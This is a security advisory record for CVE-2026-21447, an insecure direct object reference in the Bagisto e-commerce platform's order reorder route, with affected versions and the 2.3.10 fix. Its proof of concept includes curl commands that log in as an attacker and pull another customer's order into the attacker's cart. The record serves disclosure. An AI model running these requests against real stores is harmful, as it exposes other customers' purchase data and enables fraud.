GHSA-x5rw-qvvp-5cgm

Source

https://github.com/advisories/GHSA-x5rw-qvvp-5cgm

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-x5rw-qvvp-5cgm/GHSA-x5rw-qvvp-5cgm.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-x5rw-qvvp-5cgm

Aliases

CVE-2026-21447

Published

2026-01-02T22:50:47Z

Modified

2026-02-03T03:14:26.017265Z

Severity

7.1 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N CVSS Calculator

Summary

Bagisto has IDOR in Customer Order Reorder Functionality

Details

Summary

An Insecure Direct Object Reference vulnerability in the customer order reorder function allows any authenticated customer to add items from another customer's order to their own shopping cart by manipulating the order ID parameter. This exposes sensitive purchase information and enables potential fraud.

Details

The vulnerability exists in the reorder method within OrderController.php. Unlike other order-related functions like view, cancel, printInvoice that properly validate customer ownership, the reorder function retrieves orders using only the order ID without verifying that the order belongs to the authenticated customer.

Code location: packages/Webkul/Shop/src/Http/Controllers/Customer/Account/OrderController.php

Exposed Route: packages/Webkul/Shop/src/Routes/customer-routes.php

Route::get('reorder/{id}', 'reorder')->name('shop.customers.account.orders.reorder');

PoC

I. Create victim account and place an order. II. Login as attacker. III. Exploit IDOR and navigate like: http://target.xxx/customer/account/orders/reorder/1 IV. Check http://target.xxx/checkout/cart and verify exploitation. V. Victim's order items are now in Attacker's cart.

PoC via curl:

curl -c cookies.txt -X POST "http://target.xxx/customer/login" -d "email=attacker@evil.com&password=123qwe"

curl -b cookies.txt "http://target.xxx/customer/account/orders/reorder/1"

curl -b cookies.txt "http://target/api/checkout/cart"

Impact

Information Disclosure: Attackers can discover what products other customers have purchased.
Potential Fraud: Attackers could potentially exploit this for social engineering or targeted attacks.

Database specific

{
    "nvd_published_at": "2026-01-02T21:15:58Z",
    "github_reviewed_at": "2026-01-02T22:50:47Z",
    "severity": "HIGH",
    "cwe_ids": [
        "CWE-284",
        "CWE-639"
    ],
    "github_reviewed": true
}

References

Affected packages

Packagist / bagisto/bagisto

Package

Name: bagisto/bagisto
Purl: pkg:composer/bagisto/bagisto

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

2.3.10

Affected versions

v0.*

v0.1.0

v0.1.1

v0.1.2

v0.1.3

v0.1.4-BETA1

v0.1.4-BETA2

v0.1.4-BETA3

v0.1.4-BETA4

v0.1.4

v0.1.5

v0.1.6-ALPHA1

v0.1.6

v0.1.7-BETA1

v0.1.7-BETA2

v0.1.7

v0.1.8

v0.1.9-BETA1

v0.1.9

v0.2.0

v0.2.1

v0.2.2

v1.*

v1.0.0-BETA1

v1.0.0

v1.1.0

v1.1.1

v1.1.2

v1.2.0-BETA1

v1.2.0

v1.3.0

v1.3.1

v1.3.2

v1.3.3

v1.4.0

v1.4.1

v1.4.2

v1.4.3

v1.4.4

v1.4.5

v1.5.0

v1.5.1

v2.*

v2.0.0-BETA-1

v2.0.0

v2.1.0

v2.1.1

v2.1.2

v2.2.0

v2.2.1

v2.2.2

v2.2.3

v2.2.4

v2.2.5

v2.2.6

v2.2.7

v2.2.8

v2.2.9

v2.2.10

v2.3.0

v2.3.1

v2.3.2

v2.3.3

v2.3.4

v2.3.5

v2.3.6

v2.3.7

v2.3.8

v2.3.9

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-x5rw-qvvp-5cgm/GHSA-x5rw-qvvp-5cgm.json"